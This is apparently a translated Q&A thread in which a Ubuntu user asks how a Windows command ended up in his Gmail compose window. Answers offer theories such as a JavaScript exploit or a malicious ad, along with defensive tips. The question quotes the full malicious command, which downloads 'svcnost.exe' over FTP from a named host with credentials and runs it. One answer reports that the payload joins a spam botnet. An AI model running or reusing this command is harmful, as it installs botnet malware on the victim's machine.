Como identificar se meu computador Linux foi invadido?

Navegue suas respostas
126

Meu PC doméstico está normalmente ligado, mas o monitor está desligado. Esta noite, cheguei em casa do trabalho e descobri o que parece ser uma tentativa de hack: no meu navegador, meu Gmail estava aberto (era eu), mas estava no modo de composição com o seguinte no campo TO :

md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo You got owned

Isso parece o código de linha de comando do Windows para mim, e o md do código combinado com o fato de o Gmail estar no modo de composição, torna evidente que alguém tentou executar um comando cmd . Acho que tive sorte de não executar o Windows neste PC, mas tenho outros que fazem isso. Esta é a primeira vez que algo assim aconteceu comigo. Eu não sou um guru do Linux e não estava executando nenhum outro programa além do Firefox na época.

Tenho certeza absoluta de que não escrevi isso e ninguém mais estava fisicamente em meu computador. Além disso, recentemente mudei minha senha do Google (e todas as minhas outras senhas) para algo como vMA8ogd7bv , então não acho que alguém invadiu minha conta do Google.

O que aconteceu? Como alguém coloca as teclas digitadas no meu computador quando não é a velha máquina Windows da vovó que está executando malware há anos, mas uma nova instalação recente do Ubuntu?

Atualização:
Deixe-me abordar alguns dos pontos e perguntas:

  • Estou na Áustria, no campo. Meu roteador WLAN é executado WPA2 / PSK e uma senha média strong que não está no dicionário; teria que ser força bruta e menos de 50 metros daqui; Não é provável que tenha sido hackeado.
  • Estou usando um teclado com fio USB, então é muito improvável que alguém possa estar dentro do alcance para hacká-lo.
  • Eu não estava usando meu computador na época; foi apenas em casa enquanto eu estava no trabalho. É um PC nettop montado no monitor, por isso raramente o desligo.
  • A máquina tem apenas dois meses, só roda o Ubuntu, e eu não estou usando software estranho ou visitando sites estranhos. É principalmente Stack Exchange, Gmail e jornais. Sem jogos. O Ubuntu está preparado para se manter atualizado.
  • Não estou ciente de nenhum serviço VNC em execução; Eu certamente não instalei ou habilitei um. Eu também não iniciei nenhum outro servidor. Não tenho certeza se algum deles está sendo executado no Ubuntu por padrão?
  • conheço todos os endereços IP da atividade da conta do Gmail. Tenho quase certeza de que o Google não é uma entrada.
  • Eu encontrei um Visualizador de arquivos de log , mas não sei o que procurar. Ajuda?

O que eu realmente quero saber é, e o que realmente me faz sentir inseguro é: como alguém da Internet pode gerar pressionamentos de teclas na minha máquina? Como posso evitar isso sem ser todo mundo sobre isso? Eu não sou um geek do Linux, eu sou um pai que mexeu com o Windows por mais de 20 anos e estou cansado disso. E em todos os 18 anos de estar on-line, eu nunca vi qualquer tentativa de hack, então isso é novo para mim.

    
por Torben Gundtofte-Bruun 20.04.2011 / 20:24

5 respostas

66

Eu duvido que você tenha alguma coisa com que se preocupar. Foi mais do que provável que um ataque de JavaScript tenha tentado fazer um drive por download . Se você está preocupado com isso, comece a usar NoScript e AdBlock Plus Add-ons do Firefox.

Mesmo visitando sites confiáveis, você não está seguro porque eles executam código JavaScript de anunciantes de terceiros que podem ser mal-intencionados.

Eu peguei e rodei em uma VM. Ele instalou o mirc e este é o log de status ... link

É um ataque automatizado que está tentando fazer você baixar o mIRC e se juntar a um botnet que vai transformá-lo em um spambot ... Ele teve minha VM unida e fez uma conexão com vários endereços remotos diferentes, um dos quais é autoemail-119.west320.com .

Executando-o no Windows 7 eu tive que aceitar o prompt do UAC e permitir o acesso através do firewall.

Parece haver toneladas de relatórios desse comando exato em outros fóruns, e alguém até diz que um arquivo torrent tentou executá-lo quando terminou o download ... Eu não sei como isso seria possível.

Eu não usei isso sozinho, mas ele deve ser capaz de mostrar as conexões de rede atuais para que você possa ver se está conectado a algo fora da norma: link

    
por 20.04.2011 / 20:41
41

Concordo com @ jb48394 que é provavelmente uma exploração de JavaScript , como tudo mais nos dias de hoje.

O fato de que ele tentou abrir uma janela cmd (consulte @torbengb's comment ) e executar um comando malicioso, em vez de apenas baixar o trojan discretamente em segundo plano, sugere que explora alguma vulnerabilidade no Firefox que permite inserir key-stroke , mas não executar código.

Isso também explica por que esse exploit, que foi claramente escrito exclusivamente para o Windows, também funcionaria no Linux: o Firefox executa o JavaScript da mesma maneira em todos os SO < em>> (pelo menos, tenta :)) . Se fosse causado por um estouro de buffer ou por um exploit similar feito para o Windows, ele teria acabado de travar o programa.

Quanto ao local de origem do código JavaScript - provavelmente um anúncio mal-intencionado do Google (ciclo de anúncios no Gmail ao longo do dia) . não seria seja o primeiro tempo .

    
por 20.04.2011 / 23:52
12

Eu encontrei um ataque similar em outra máquina Linux. Parece que é algum tipo de comando FTP para o Windows.

    
por 20.04.2011 / 20:36
5

Isso não responde a toda a sua pergunta, mas, no arquivo de log, procure tentativas de logon com falha.

Se houver mais de cinco tentativas com falha em seu log, alguém tentou violar root . Se houver uma tentativa bem-sucedida de fazer logon no root enquanto você estiver longe do seu computador, MUDE SUA SENHA IMEDIATAMENTE !! Eu quero dizer agora! De preferência para algo alfanumérico e cerca de 10 caracteres de comprimento.

Com as mensagens que você recebeu (os comandos echo ), isso realmente parece um script infantil imaturo. Se fosse um verdadeiro hacker que sabe o que estava fazendo, você provavelmente ainda não saberia disso.

    
por 21.04.2011 / 06:13
-1

whois relatórios west320.com são de propriedade da Microsoft.

UPnP e Vino (Sistema - > Preferências - > Área de Trabalho Remota) combinado com uma senha fraca do Ubuntu?

Você usou algum repositório não padrão?

O DEF CON tem uma competição de Wi-Fi a cada ano sobre a distância que um ponto de acesso Wi-Fi pode ser alcançado - o último que ouvi foi 250 milhas.

Se você realmente quiser ter medo, veja as imagens de um centro de comando-n-controle de um Zeus botnet . Nenhuma máquina é segura, mas o Firefox no Linux é mais seguro que o resto. Melhor ainda, se você executar o SELinux .

    
por 20.04.2011 / 23:59

Tags

Pequenos quadrados de waffle de cobre dentro do computador Como posso intencionalmente quebrar / corromper um setor em um cartão SD?